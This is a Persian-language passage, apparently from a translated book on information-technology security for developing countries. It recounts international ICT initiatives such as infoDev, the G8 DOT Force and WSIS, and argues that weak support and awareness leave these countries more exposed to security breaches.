ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺩﺭ ﻳـﻚ ﻣﺆﺳـﺴﺔ ﭼﻨـﺪﻣﻨﻈﻮﺭﻩ ﺗﻮﺳـﻂ ﺑﺮﻧﺎﻣـﺔ
infoDevﺩﺭ ﮔــﺮﻭﻩ ﺑﺎﻧــﻚ ﺟﻬــﺎﻧﻲ ﺩﺭ ﺳــﺎﻝ ۱۹۹۵ﻣــﻴﻼﺩﻱ
ﺭﺳﻤﹰﺎ ﺍﻋﻼﻡ ﺷﺪ ﻭ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻜﺮﻱ ﺭﺋﻴﺲ ﻭﻗﺖ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ
ﺟﻴﻤﺰ ﻭﻟﻔﺴﻦ ١ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﻮﺩ ﻛﻪ ﺑﺮ ﺍﻫﻤﻴﺖ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻫـﺪﺍﻑ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ -ﺍﺟﺘﻤـﺎﻋﻲ
ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺖ .ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌﺪ ﺧﻮﺵﺑﻴﻨﻲ ﻧـﺴﺒﺖ ﺑـﻪ
ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ -ﺍﺟﺘﻤﺎﻋﻲ ﺑﻴﺸﺘﺮ ﺷـﺪ ﻛـﻪ ﺑﺨـﺸﻲ ﺍﺯ ﺁﻥ ﺑـﻪ
ﺩﻟﻴﻞ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺍﻥ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﻮﺩ.
(۶
(۷
ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﮔـﺮﻭﻩ ،G8ﻛﻤﻴﺘـﺔ ﻛـﺎﺭﻱ
ﻓﺮﺻــﺘﻬﺎﻱ ﺩﻳﺠﻴﺘــﺎﻟﻲ ) ٢(DOTﺭﺍ ﭘﺎﻳــﻪﺭﻳــﺰﻱ ﻛﺮﺩﻧــﺪ .ﻛﻤﻴﺘــﺔ
DOTﻧﺘﺎﻳﺞ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﻃﻲ ﮔﺰﺍﺭﺷﻲ ﺍﺭﺍﺋـﻪ ﻧﻤـﻮﺩ ﻭ ﺧﻮﺍﺳـﺘﺎﺭ
ﻗﺮﺍﺭﮔﺮﻓﺘﻦ ۹ﻣﻮﺿﻮﻉ ﺩﺭ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ ﮊﻧﻮ ٣ﺷﺪ ﻛﻪ ﻫﻤـﺔ ﺁﻧﻬـﺎ
ﺩﺭ ﺍﺟــﻼﺱ ﺳــﺮﺍﻥ ﮊﻧــﻮ ﺩﺭ ﺳــﺎﻝ ۲۰۰۱ﺑــﻪ ﺗﺄﻳﻴــﺪ ﻭ ﺍﻣــﻀﺎﻱ
ﺭﻫﺒــﺮﺍﻥ ﮔــﺮﻭﻩ G8ﺭﺳــﻴﺪﻧﺪ .ﺍﻋــﻀﺎﻱ ﺍﺻــﻠﻲ ﻛﻤﻴﺘــﺔ DOT
ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺍﺻﻠﻲ ﮔـﺮﻭﻩ G8ﻭ ﺩﻭﻟﺘﻬـﺎﻱ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ
ﺗﻮﺳﻌﻪ ،ﺑﺨﺸﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻧﺒـﻮﻫﻲ
ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻫﺴﺘﻨﺪ .ﮔﺰﺍﺭﺵ ﻣﺰﺑـﻮﺭ ﺷـﺎﻣﻞ ۷ﺑﻨـﺪ
ﻋﻤﻠﻴــﺎﺗﻲ ﺑﻌﻨــﻮﺍﻥ ﻣﻮﺿــﻮﻋﺎﺕ ﺣﻴــﺎﺗﻲ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ ﺟﺎﻣﻌــﺔ
ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺑﺎﺷﺪ:
(۱ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ
(۲ﺍﺭﺗﻘﺎ ﻭ ﺑﻬﺒﻮﺩ ﺩﺳﺘﺮﺳﻲ
(۳ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ
James Wolfensohn
Digital Opportunity Taskforce Group
Genoa Plan of Action
1
2
3
ﭘﺮﻭﺭﺵ ﻛﺎﺭﺁﻓﺮﻳﻨﺎﻥ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﺁﻓﺮﻳﻨﻲ
ﻣﺸﺎﺭﻛﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻛﺎﺭﺑﺮﺩ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺑﻬﺪﺍﺷﺖ ﻭ ﺳﻼﻣﺖ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻣﻔﺎﻫﻴﻢ ﻣﺤﻠﻲ
ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﺍﻳﺠﺎﺩ ﻛﻤﻴﺘﺔ ﺍﺟﺮﺍﻳﻲ ICTﺩﺑﻴﺮ ﻛـﻞ
ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ٤ﺑﻮﺩ ﻭ ﺍﺯ ﺩﻳﮕﺮ ﻧﺘـﺎﻳﺞ ﺁﻥ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺗـﺸﻜﻴﻞ
ﻣﺆﺳﺴﺔ ﭘﻴﺸﮕﺎﻣﺎﻥ ﻓﺮﺻﺘﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ٥ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﺍﻋﺘﺒﺎﺭ ،٦UNDPﺑﻨﻴﺎﺩ ﺁﻛﺴﻨﭽﺮ ٧ﻭ ﺑﻨﻴﺎﺩ ﻣﺎﺭﻛﻞ ٨ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﻫﻤﭽﻨﻴﻦ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻣﺆﺳـﺴﺎﺕ ﺩﻭﻣﻨﻈـﻮﺭﻩ ﺩﺭ ﻃﺮﺣﻬـﺎﻱ
ﺗﻮﺳــﻌﻪﺍﻱ ﺧــﻮﺩ ﺗﻮﺟــﻪ ﺭﻭﺯﺍﻓﺰﻭﻧــﻲ ﺑــﻪ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ .ﭘﺲ ﺍﺯ ﺁﻥ ITUﻭ UNESCOﻧﻴﺰ
ﻃﺮﺣﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﮔـﺰﺍﺭﻱ ﺩﻭ ﺍﺟـﻼﺱ ﺟﻬـﺎﻧﻲ ﺑـﺎ ﻧﺎﻣﻬـﺎﻱ
ﺍﺟــﻼﺱ ﺟﻬــﺎﻧﻲ ﺳــﺮﺍﻥ ﺟﺎﻣﻌــﺔ ﺍﻃﻼﻋــﺎﺗﻲ ) ٩(WSISﺩﺭ ﮊﻧــﻮ
)ﺩﺳﺎﻣﺒﺮ (۲۰۰۳ﻭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳﻞ (۲۰۰۵ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ.
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺷـﻜﻞ ﻏﻴﺮﻣـﺴﺘﻘﻴﻢ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺗﻮﺳـﻌﻪﺍﻱ ﻫـﺰﺍﺭﻩ
) ١٠(MDGﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ .ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﺻــﻠﻲ ﺗــﺄﻣﻴﻦ ﺍﻣﻨﻴــﺖ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻧﻬـﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ ﺑﺎﻋـﺚ
ﺗﻘﻮﻳﺖ ﺟﺮﻳﺎﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣـﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ
ﺧﻮﺍﻫﺪ ﺷﺪ ﻭ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎ ﺑﻪ ﻓﺮﺍﻫﻢ ﺷﺪﻥ ﺍﻋﺘﺒـﺎﺭ ﺑـﺮﺍﻱ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲﺍﻧﺠﺎﻣﺪ.
ﺣﺎﻝ ﺍﻳﻦ ﺳﺆﺍﻝ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﭼﺮﺍ ﺑﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻪ ﺩﺭ ﻭﻫﻠـﺔ
ﺍﻭﻝ ﺑﺮﺍﻱ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻧﮕﺎﺷـﺘﻪ
ﺷﺪﻩ ﻧﻴﺎﺯ ﺍﺳﺖ .ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛـﻪ ﺍﺻـﻮﻝ
ﺍﻣﻨﻴﺘﻲ ﻫﻤﻮﺍﺭﻩ ﻳﻜﺴﺎﻧﻨﺪ؛ ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ،ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻳـﺎ ﺗﻮﺳـﻌﻪﻧﻴﺎﻓﺘـﻪ ﺑﺎﺷـﻴﺪ؛ ﭼﺮﺍﻛـﻪ
ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻫـﺮ ﮔﻮﺷـﺔ
ﺟﻬﺎﻥ ﻇﺎﻫﺮ ﺷﻮﻧﺪ .ﺍﻟﺒﺘﻪ ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﻲ ﺗﺮﺩﻳـﺪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻫﻤﻴﺸﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺘﻨﺪ.
U.N. Secretary General's ICT Task Force
Global Digital Opportunities Initiative
United Nations Development Program
Accenture Foundation
Markle Foundation
World Summit on Information Society
Millennium Development Goals
4
5
6
7
8
9
10
١٥
ﭘﻴﺶﺩﺭﺁﻣﺪ
ﺍﺑﺘﺪﺍ ﺫﻛﺮ ﺍﻳﻦ ﻧﻜﺘﻪ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ
ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺩﺳﺘﺮﺳﻲ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ
ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﺗﻜﻨﻴﻜﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ
ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﻧﻤﺎﻳـﺪ .ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻛﺘﺎﺑﻔﺮﻭﺷـﻲﻫـﺎ ﻭ
ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ
ﻭ ﻟﺬﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻫـﻢﺻـﻨﻒ ﺩﻳﮕـﺮ ﺑـﻪ ﺭﺍﺣﺘـﻲ
ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻣﻲﺑﺎﺷﺪ .ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺩﭼﺎﺭ ﺍﺷـﻜﺎﻝ
ﻣﻲﺷﻮﺩ ،ﻣﺠﻤﻮﻋﻪﺍﻱ ﻏﻨﻲ ﺍﺯ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ
ﻛﻪ ﺍﺧﺒﺎﺭ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ ﺍﺭﺳـﺎﻝ ﻣـﻲﮔـﺮﺩﺩ.
ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺩﺍﺭﺍﻱ
ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳﺎﻧﻲ ١١ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨـﻲ ﺍﺩﺍﺭﻩ
ﻣﻲﺷﻮﻧﺪ ﻭ ﻗﺎﺩﺭ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺳﻮﺀ ﻣﻨـﺎﺑﻊ ﺳـﺎﺯﻣﺎﻧﻲ ﻭ
ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇﺖ ﺁﻧﻬﺎ ﻣﻲﺑﺎﺷﻨﺪ.
ﻻ
ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻌﻤـﻮ ﹰ
ﻓﺎﻗﺪ ﺗﻮﺍﻧﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺍﻳﻦ ﺳﻄﺢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻫﺴﺘﻨﺪ .ﺗﻌﺪﺍﺩ ﻛﺎﺭﺑﺮﺍﻥ
ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎ ﻭ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻧﻴـﺰ ﺗﻮﺟـﻪ
ﻧﻤﻲﺷﻮﺩ .ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻏﺎﻟﺒﹰﺎ ﺩﺍﺭﺍﻱ
ﺑﺨﺶ ﺳﺘﺎﺩﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺗﻮﺍﻧﺎﻳﻲ ﻧﻈﺎﺭﺕ ﺑـﺮ ﻣﻨـﺎﺑﻊ
ﻓﻨﻲ ﺩﺍﺧﻠﻲ ﺧﻮﺩ ﺭﺍ ﻧﺪﺍﺭﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﻋﺪﻡ ﺗﻮﺟـﻪ ﻭ
ﻧﺎﺗﻮﺍﻧﻲ ﺑﻪ ﺩﻟﻴﻞ ﻋﺪﻡ ﻭﺟﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺩﺍﻧـﺶ ﻛـﺎﻓﻲ ﺩﺭﺑـﺎﺭﺓ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳـﺖ ،ﻭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻛـﻪ
ﻻ ﺩﺭ ﻓﻬـﻢ ﭼﮕـﻮﻧﮕﻲ
ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩﺍﻧﺪ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﺳﺎﺯﮔﺎﺭﺳﺎﺯﻱ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻓﻨـﻲ ﺑـﺎ ﺷـﺮﺍﻳﻂ ﻣﺘﻐﻴـﺮ ﻭ ﻏﻴﺮﻗﺎﺑـﻞ
ﻲ ﺍﻳﻦ ﻣﺤﻴﻂ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ.
ﭘﻴﺶﺑﻴﻨ ﹺ
ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓـﺮﻭﺵ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺑـﺼﻮﺭﺕ ﻧﺎﻣﺤـﺪﻭﺩ ﺑـﺮﺍﻱ
ﺭﺍﻳﺎﻧﻪ ﻫﺎﻳﻲ ﻛﻪ ﻛـﻢﺗﻌـﺪﺍﺩ ﻭ ﮔﺮﺍﻧﻘﻴﻤـﺖ ﺑﻮﺩﻧـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ
ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺣﺠﻢ ﺍﻧﺒـﻮﻩ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ
ﺑﺎﺯﺍﺭ ﻧﻤﻲﺗﻮﺍﻥ ﺑﺴﺎﺩﮔﻲ ﭼﻨﻴﻦ ﺧﺪﻣﺎﺗﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ .ﻓﺮﻭﺷﮕﺎﻫﻬﺎ
ﻻ ﺍﺯ ﻣـﺸﻜﻼﺗﻲ ﻛـﻪ ﺩﺭ
ﻭ ﻣﺮﺍﻛﺰ ﺧﺪﻣﺎﺕ ﺗﻌﻤﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤـﻮ ﹰ
ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﻣﻄﻠﻊ ﻧﻴﺴﺘﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮﺍﻥ
ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺑﻪ ﻗﺮﺑﺎﻧﻴـﺎﻥ ﺗﻮﺳـﻌﺔ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ
ﻓﻨﺎﻭﺭﻱ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﻧﺪ.
ﻧﻘﺺ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﻪ ﺩﺭ ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎ ﺍﺗﻔـﺎﻕ ﻣـﻲﺍﻓﺘـﺪ ﻭ ﺣﺘـﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺗﺤﺖ ﻓﺸﺎﺭ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﻭﻟﺘﻬﺎ ﻧﻴﺰ ﺑﮕـﺮﺩﺩ.
ﻻ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻧﻘﺼﻬﺎ ﮔﺰﺍﺭﺵ ﻧﻤﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻃﻼﻉ
ﻣﻌﻤﻮ ﹰ
Help Centers
11
ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻧﺎﻣﻄﻠﻮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ .ﺩﻭﻟﺘﻬﺎ
ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺍﻧـﺎﻳﻲ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﻧﻘﺼﻬﺎﻳﻲ ﺭﺍ ﺩﺍﺭﻧﺪ ،ﻭﻟـﻲ ﻧﺘـﺎﻳﺞ ﻧﺎﺷـﻲ ﺍﺯ ﺑـﺮﻭﺯ
ﻧﻘــﺼﻬﺎ ﻭ ﺍﺷــﻜﺎﻻﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺧﻴﻢﺗﺮ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ ﻛﻨﺎﺭ
ﻫﻤﺔ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ،ﺑﺎﺯﺍﺭﻫﺎ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺩﻭﻟﺘﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ
ﺗﻮﺳﻌﻪ ﺑﻪ ﺩﻟﻴـﻞ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺑـﻪ ﻋﻮﺍﻗـﺐ ﻧﺎﺷـﻲ ﺍﺯ ﻧﻔﻮﺫﻫـﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﺠﻢ ﻭﺳﻴﻊ ،ﻋﺪﻡ ﺗﻮﺍﻧﺎﻳﻲ ﺗﺤﻠﻴﻞ ﺿـﺮﺭﻫﺎﻱ ﻣـﺎﻟﻲ
ﻧﺎﺷﻲ ﺍﺯ ﺍﻳﻦ ﺣﻤﻼﺕ ،ﻭ ﻧﻴﺰ ﻧﺪﺍﺷﺘﻦ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺯﻣـﺎﻥ
ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ )ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﺧﺴﺎﺭﺍﺕ ﻗﺎﺑﻞ ﺗﺮﻣﻴﻢ
ﺑﺎﺷﻨﺪ( ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﺭﻓﻊ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﻧﺪ.
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ ﺍﻭﻟﻮﻳـﺖ
ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ ،ﭼﺮﺍﻛﻪ ﺧﻄـﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ
ﺑﻴﺸﺘﺮ ﻣﺘﻮﺟﻪ ﻣﻜﺎﻧﻬﺎﻳﻲ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﻛﻨﺘـﺮﻝ ﻛـﺎﻓﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﻧﺒﻮﺩﻩ ﻭ ﻧﺎﺍﻣﻦ ﻫﺴﺘﻨﺪ .ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﺗـﺄﻣﻴﻦ ﺷـﺪﻩ ﺍﻫـﺪﺍﻑ
ﺟﺬﺍﺏﺗﺮﻱ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﻫـﺴﺘﻨﺪ .ﻛـﺪﺍﻡ ﺳـﺎﺯﻣﺎﻥ ﻛﻮﭼـﻚ ﻳـﺎ
ﻣﺘﻮﺳﻂ ﺍﺳﺖ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ
ﻣﺸﺘﺮﻳﺎﻥ ،ﻓﺎﻳﻠﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻜﺎﺭﻱ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ
